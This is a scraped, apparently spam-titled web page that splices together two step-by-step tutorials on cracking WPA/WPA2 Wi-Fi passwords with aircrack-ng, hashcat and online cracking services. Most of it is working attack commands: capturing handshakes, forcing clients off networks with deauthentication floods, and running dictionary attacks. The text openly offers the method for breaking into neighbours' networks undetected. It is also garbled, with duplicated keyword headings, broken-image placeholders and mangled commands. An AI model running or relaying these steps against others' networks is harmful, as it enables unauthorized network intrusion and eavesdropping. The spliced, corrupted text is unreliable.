Return to site

Dictionary Txt For Aircrack For Mac

broken image


Jul 27, 2018. Aircrack-ng -w firstlist.txt,secondlist.txt,thirdlist.txt wpa2.eapol.cap Aircrack-ng comes with a small dictionary called password.lst. The password.lst file is located in the 'test' directory of the source files.

This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby.

The attack outlined below is entirely passive and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and to get the handshake value.

DISCLAIMER: This method is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use.

Requirements:

  1. A Kali Linux machine (2017.1 preferably)
  2. A USB Wi-Fi Adapter which supports monitor mode.
  3. Have aircrack-ng utility installed.

If aircrack-ng is not installed in your Linux machine, then you can easily install it via below command:

sudo apt-get install aircrack-ng

Now first step is to recognize your wireless adapter by typing 'iwconfig' in your terminal.

Here you can see, wlan0 is your wireless interface and it tells that it supports 802.11, ESSID is off and mode is managed etc.

Now second step is to use Aircrack-ng which converts your wireless card into promiscuous monitor mode, it means it can see and receive all network traffic.

Here ng means New Generation, because aircrack-ng replaces older suite called aircrack that is no longer supported.

Now to start the monitor mode, just type 'airmon-ng start wlan0', which converts your wlan0 into wlan0mon.

The next tool is airodum-ng which enables us to capture packets of our specifications. Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface by typing 'airodump-ng wlan0mon' in your same terminal.

You should see the output similar to above screen.

For the purposes of this practical, we will choose to crack the password of our network, 'Chetan Soni'. Remember the BSSID MAC address and channel (CH) number as displayed by, as we will need them both for the further steps.

So Our BSSID address is C4:F0:81:A1:0C:99 and Channel No is 11.

As we can see in the screenshot above, airodump-ng displays all of the APs (access points) within range with their BSSID (MAC address), their power, the number of beacon frames, the number of data packets, the channel, the speed, the encryption method, the type of cipher used, the authentication method used, and finally, the ESSID.

Now next step is to capture a 4-way handshake because WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password.

These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work.

To capture 4-way handshake, type 'airodump-ng -c 11 –bssid C4:F0:81:A1:0C:99 -w yeahhub wlan0mon' in your terminal.

Here -c stands for Channel, –bssid stands for Mac Address and -w stands for writing the packets into file.

You should see the output similar to above screen. Now here you can see in top right corner of above screen, there is no handshake so to get the handshake value instantly, we'll use deauthentication method in which we'll forced to send the malicious deauthentication packets to the target for reconnect.

To deauthentication the target, type 'aireplay-ng -0 2 -a C4:F0:81:A1:0C:99-c 84:10:0D:9E:A1:CD wlan0mon' in another terminal.

Aireplay-ng is another powerful tool in our aircrack-ng arsenal, and it can be used to generate or accelerate traffic on the AP. This can be especially useful in attacks like a deauth attack that bumps everyone off the access point, WEP and WPA2 password attacks, as well as ARP injection and replay attacks.

Here -a stands for BSSID address of the target and -c stands for station address.

A deauth attack sends forged deauthentication packets from your machine Nto a client connected to the network you are trying to crack. These packets include fake 'sender' addresses that make them appear to the client as if they were sent from the access point themselves.

Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake as shown below.

You can optionally broadcast deauth packets to all connected clients with 'aireplay-ng -0 2 -a wlan0m0n'.

So here, our handshake is 'C4:F0:81:A1:0C:99'.

Once you've captured a handshake, press CTRL +C to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called yeahhub-01.cap). We will use this capture file to crack the network password.

Now the final step is to crack the password using the captured handshake. If you have access to a GPU, we highly recommend using hashcat for password cracking.

Method 1 – GPUHASH.me

You can also use a website Gpuhash.me through which you simply need to upload your .cap file by clicking on Add new task.

In 2nd step, click on Next

Now select the Basic WPA search package and fill out your email address and then click on SEND.

At the end, you'll get a task id where you can easily monitor your status whether your password they cracked or not.

Method 2 – OnlineHashCrack

Dictionary Txt For Aircrack For Mac

You can also upload your .cap file into OnlineHashCrack website along with your email address and then submit. Here you can upload the .cap file of maximum size is 20MB only.

Method 3 – Naive-Hashcat

Before to crack the password using naive-hashcat, we need to convert our .cap to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.

You can also use hashc.co.uk website to convert the .cap file into .hccapx file.

You can also use hashcat utility which is an open source script which you can download it through github by typing 'git clone https://github.com/hashcat/hashcat-utils.git'.

After downloading the hashcat, go into /src directory and type 'make' command to compile the package.

Now run the following command to convert the .cap file into .hccapx format using hashcat.

Command: ./cap2hccapx.bin <.cap file path>

Now copy the .hccapx file to root because we need this file with naive-hashcat script.

Now to install naive-hashcat package, type 'git clone https://github.com/brannondorsey/naive-hashcat'.

Download the dictionary file by typing 'curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt'.

Now type 'HASH_FILE=../yeahhub.hccapx POT_FILE=yeahhub.pot HASH_TYPE=2500 ./naive-hashcat.sh'.

Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to yeahhub.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your pot file.

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:Chetan Soni:hackitnow

Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a word list. Now copy the same dictionary file into root by typing below command:

Note, that if the network password is not in the word file you will not crack the password.

To crack the password using aircrack-ng, type 'aircrack-ng -a2 -b C4:F0:81:A1:0C:99 -w dictionary.txt yeahhub-01.cap'.

If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password as shown below:

Yippe, we got the key! Much of the information presented here was gleaned from Github. Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat.

Aircrack-ng is a whole suite of tools for Wireless Security Auditing. It can be used to monitor, test, crack or attack Wireless Security Protocols like WEP, WPA, WPA2. Aircrack-ng is command line based and is available for Windows and Mac OS and other Unix based Operating systems. Aircrack-ng suite contains a lot of tools used for various purposes but here we'll only look at some important tools that are used more often in Wireless Security testing.

Airmon-ng

Airmon-ng is used to manage wireless card modes and to kill unnecessary processes while using aircrack-ng. To sniff a wireless connection, you need to change your wireless card from managed mode to monitor mode and airmon-ng is used for that purpose.

Airodump-ng

Airodump-ng is a wireless sniffer that can capture wireless data from one or more wireless Access Points. It is used to analyze nearby Access Points and to capture handshakes.

Aireplay-ng

Aireplay-ng is used for replay attacks and as packet injector. It can be de-authenticate users from their APs to capture handshakes.

Airdecap-ng

Airdecap-ng is used to decrypt encrypted WEP, WPA/WPA2 wireless packets with known key.

Aircrack-ng

Aircrack-ng is used to attack WPA/WEP wireless protocols in order to find the key.

Aircrack-ng is easy to install in Ubuntu using APT. Just type the following command and this will install all tools available in Aircrack-ng suite.

sudoapt-get update
sudoapt-get install-y aircrack-ng

Usage

In this article, we'll take a quick look at how to use aircrack-ng to crack an encrypted wireless network (TR1CKST3R in this example) to find the password.

First of all, list out all available wireless cards connected to your PC using ‘iwconfig' command.

We'll use ‘wlxc83a35cb4546' named wireless card for this tutorial (This might be different in your case). Now, kill all the processes running on wireless card using airmon-ng.

ubuntu@ubuntu:~$ sudo airmon-ng check kill
Start Monitor mode on ‘wlxc83a35cb4546' by typing
ubuntu@ubuntu:~$ sudo airmon-ng start wlxc83a35cb4546

Now, airmon-ng has started Monitor mode on wireless card, it'll appear as different name ‘wlan0mon'. Run ‘iwconfig' again to list wireless details.

Then, use airodump-ng to see nearby Wireless Access Points and their properties.

You can narrow down search using MAC (–bssid) and channel (-c) filters. To capture handshake (Handshake contains encrypted password), we need to save our packets somewhere using '–write' option. Type,

ubuntu@ubuntu:~$ sudo airodump-ng --bssid 6C:B7:49:FC:62:E4
-c11 wlan0mon --write/tmp/handshake.cap
--bssid : Access Point's MAC Address
-c : Access Point's channel [1-13]
--write : Stores captured packets at a defined location

Now, we need to de-authenticate every device from this Access Point using Aireplay-ng utility. Write

ubuntu@ubuntu:~$ sudo aireplay-ng -0100-a[MAC_ADD] wlan0mon

-a : Specify Access Points MAC for Aireplay-ng

-0 : Specify number of deauth packets to send

Dictionary Txt For Aircrack For Mac Download

After a while, all devices will be disconnected from that Access Point, when they'll try to reconnect, running airodump-ng will capture the handshake. It'll appear at the top of running airodump-ng.

Handshake is stored in ‘/tmp/' directory, and contains encrypted password that can be brute forced offline using a dictionary. To crack the password, we'll be using Aircrack-ng. Type

ubuntu@ubuntu:~$ sudo aircrack-ng /tmp/handshake.cap-01.cap -w
/usr/share/wordlists/rockyou.txt
-w : Specify the dictionary location

Aircrack-ng will go through the list of passwords, and if found, it'll display the password used as key.

In this case, aircrack-ng found the password used ‘123456789'.

Now, stop Monitor mode on wireless card and restart the network-manager.

ubuntu@ubuntu:~$ sudo airmon-ng stop wlan0mon
ubuntu@ubuntu:~$ sudo service network-manager restart

Dictionary Txt For Aircrack For Mac Windows 7

Conclusion

Dictionary Txt For Aircrack For Mac Free

Aircrack-ng can be used to audit Wireless Security or to crack forgotten passwords. There are some other similar tools available for this purpose like Kismet but aircrack-ng is better known for good support, versatility and having wide range of tools. It has easy to use Command line interface which can easily be automated using any scripting language like Python.





broken image